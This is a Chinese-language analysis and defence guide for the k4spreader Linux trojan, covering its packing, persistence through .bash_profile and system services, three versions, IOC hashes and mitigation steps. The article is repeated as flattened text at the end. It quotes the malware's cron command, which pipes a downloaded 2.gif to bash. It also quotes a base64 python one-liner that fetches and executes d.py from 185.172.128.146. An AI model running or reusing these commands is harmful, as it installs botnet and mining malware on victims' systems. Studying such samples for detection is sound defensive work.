k4spreader木马详细分析--国内大量企业和单位被感染
字数 1801 2025-08-24 20:49:22

k4spreader木马详细分析及防御指南

概述

k4spreader是一种针对Linux系统的恶意木马程序,近期在国内大量企业和单位中被发现感染。该木马由Golang语言编写,主要功能包括自我复制、持久化驻留、横向传播以及下载执行其他恶意载荷(如Tsunami僵尸网络和PwnRig挖矿病毒)。

样本版本分析

v1版本样本

技术特征

  1. 加壳方式:使用UPX加壳,可通过upx -d命令脱壳
  2. 编程语言:Golang编写,函数名包含"k4spreader"字符串
  3. 单实例运行:通过文件锁机制确保系统中只运行一个实例
    • 创建隐藏文件:/tmp/.klibsystem4.lock
    • 文件中存放当前进程PID信息
    • 使用syscall指令触发系统调用

持久化技术

  1. 自我复制机制

    • 根据用户权限采取不同策略:
      • root用户
        • 调用k4spreader_utils_SetupAndStartKnlibService
        • 调用k4spreader_utils_CreateSystemService
      • 非root用户
        • 调用k4spreader_utils_AddLineToBashProfile
    • 修改.bash_profile文件,添加内容: 
      cp -f -r -- /bin/klibsystem4 2>/dev/null && /bin/klibsystem4 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem4 2>/dev/null

  2. 系统服务创建

    • 创建/etc/init.d/knlib文件
    • 创建/etc/systemd/system/knlibe.service文件
    • 复制自身到/bin/knlib路径

恶意功能

  1. 计划任务创建

    • 每10分钟执行一次外联下载: 
      */10 * * * * (curl -s %s/2.gif || wget -q -O - %s/2.gif || lwp-download %s/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d| bash
    • Base64解码后内容: 
      python -c 'import urllib;exec(urllib.urlopen("http://185.172.128.146:443/d.py").read())' || python2 -c 'import urllib;exec(urllib.urlopen("http://185.172.128.146/d.py").read())'

  2. 恶意载荷释放

    • 从自身释放bi.64bin.64文件
    • 释放的文件包括:
      • Tsunami僵尸网络
      • PwnRig挖矿病毒
    • 运行后删除释放的文件

  3. 外联下载

    • 若释放文件失败,则外联下载恶意程序

v2版本样本

  1. 加壳方式:同样使用UPX加壳
  2. 新增功能:执行关闭防火墙等操作

v3版本样本

  1. 双层加壳
    • 第一层:UPX加壳
    • 脱壳后释放文件(位于/tmp/目录)
    • 释放的文件再次使用UPX加壳
  2. 最终payload:脱壳后为k4spreader v3版本

相关IOC(入侵指标)

哈希值 版本
7bade55726a3a6e86d809836d1bc43f4f7702ecde9ceed80a09876c2efeff8d4 v1
f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712 v2
0897b1d3e3e453c160bf8d28a041eee3bd29e43a6f063faed7d3cb83a86b88cc v2
a980b1b0387534da7c9a321f7d450c02087f7a8445fc86b77785da0c510bbaa8 v2
31fd924b9a5747befdf61c03b02c90d3c2ba93c8e1a9f798e6dfefe23767e1ae v3
20d08d27631ae9bab8f3cb7cddd9b35fb75e5bee5764072f77ac3b4513307838 v3

防御建议

  1. 系统检查

    • 检查/tmp/.klibsystem4.lock文件是否存在
    • 检查/bin/klibsystem4/bin/knlib文件
    • 检查/etc/init.d/knlib/etc/systemd/system/knlibe.service服务文件
    • 检查异常的计划任务

  2. 网络监控

    • 监控与185.172.128.146的通信
    • 拦截对2.gifd.py的下载请求

  3. 防护措施

    • 及时更新系统和安全补丁
    • 限制非必要的外联访问
    • 使用EDR/XDR解决方案进行端点防护
    • 定期审计系统日志和文件完整性

  4. 应急响应

    • 发现感染后立即隔离受影响系统
    • 彻底清除所有相关文件和注册项
    • 重置所有可能泄露的凭据
    • 进行全面的系统安全检查

  5. 用户教育

    • 提高员工安全意识
    • 避免使用弱密码
    • 谨慎处理不明来源的文件和链接

通过以上分析和防御建议,组织可以有效识别和防范k4spreader木马的威胁,保护系统安全。

k4spreader木马详细分析及防御指南 概述 k4spreader是一种针对Linux系统的恶意木马程序,近期在国内大量企业和单位中被发现感染。该木马由Golang语言编写,主要功能包括自我复制、持久化驻留、横向传播以及下载执行其他恶意载荷(如Tsunami僵尸网络和PwnRig挖矿病毒)。 样本版本分析 v1版本样本 技术特征 加壳方式 :使用UPX加壳,可通过 upx -d 命令脱壳 编程语言 :Golang编写,函数名包含"k4spreader"字符串 单实例运行 :通过文件锁机制确保系统中只运行一个实例 创建隐藏文件: /tmp/.klibsystem4.lock 文件中存放当前进程PID信息 使用 syscall 指令触发系统调用 持久化技术 自我复制机制 : 根据用户权限采取不同策略: root用户 : 调用 k4spreader_utils_SetupAndStartKnlibService 调用 k4spreader_utils_CreateSystemService 非root用户 : 调用 k4spreader_utils_AddLineToBashProfile 修改 .bash_profile 文件,添加内容: 系统服务创建 : 创建 /etc/init.d/knlib 文件 创建 /etc/systemd/system/knlibe.service 文件 复制自身到 /bin/knlib 路径 恶意功能 计划任务创建 : 每10分钟执行一次外联下载: Base64解码后内容: 恶意载荷释放 : 从自身释放 bi.64 和 bin.64 文件 释放的文件包括: Tsunami僵尸网络 PwnRig挖矿病毒 运行后删除释放的文件 外联下载 : 若释放文件失败,则外联下载恶意程序 v2版本样本 加壳方式 :同样使用UPX加壳 新增功能 :执行关闭防火墙等操作 v3版本样本 双层加壳 : 第一层:UPX加壳 脱壳后释放文件(位于 /tmp/ 目录) 释放的文件再次使用UPX加壳 最终payload :脱壳后为k4spreader v3版本 相关IOC(入侵指标) | 哈希值 | 版本 | |--------|------| | 7bade55726a3a6e86d809836d1bc43f4f7702ecde9ceed80a09876c2efeff8d4 | v1 | | f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712 | v2 | | 0897b1d3e3e453c160bf8d28a041eee3bd29e43a6f063faed7d3cb83a86b88cc | v2 | | a980b1b0387534da7c9a321f7d450c02087f7a8445fc86b77785da0c510bbaa8 | v2 | | 31fd924b9a5747befdf61c03b02c90d3c2ba93c8e1a9f798e6dfefe23767e1ae | v3 | | 20d08d27631ae9bab8f3cb7cddd9b35fb75e5bee5764072f77ac3b4513307838 | v3 | 防御建议 系统检查 : 检查 /tmp/.klibsystem4.lock 文件是否存在 检查 /bin/klibsystem4 或 /bin/knlib 文件 检查 /etc/init.d/knlib 和 /etc/systemd/system/knlibe.service 服务文件 检查异常的计划任务 网络监控 : 监控与185.172.128.146的通信 拦截对 2.gif 和 d.py 的下载请求 防护措施 : 及时更新系统和安全补丁 限制非必要的外联访问 使用EDR/XDR解决方案进行端点防护 定期审计系统日志和文件完整性 应急响应 : 发现感染后立即隔离受影响系统 彻底清除所有相关文件和注册项 重置所有可能泄露的凭据 进行全面的系统安全检查 用户教育 : 提高员工安全意识 避免使用弱密码 谨慎处理不明来源的文件和链接 通过以上分析和防御建议,组织可以有效识别和防范k4spreader木马的威胁,保护系统安全。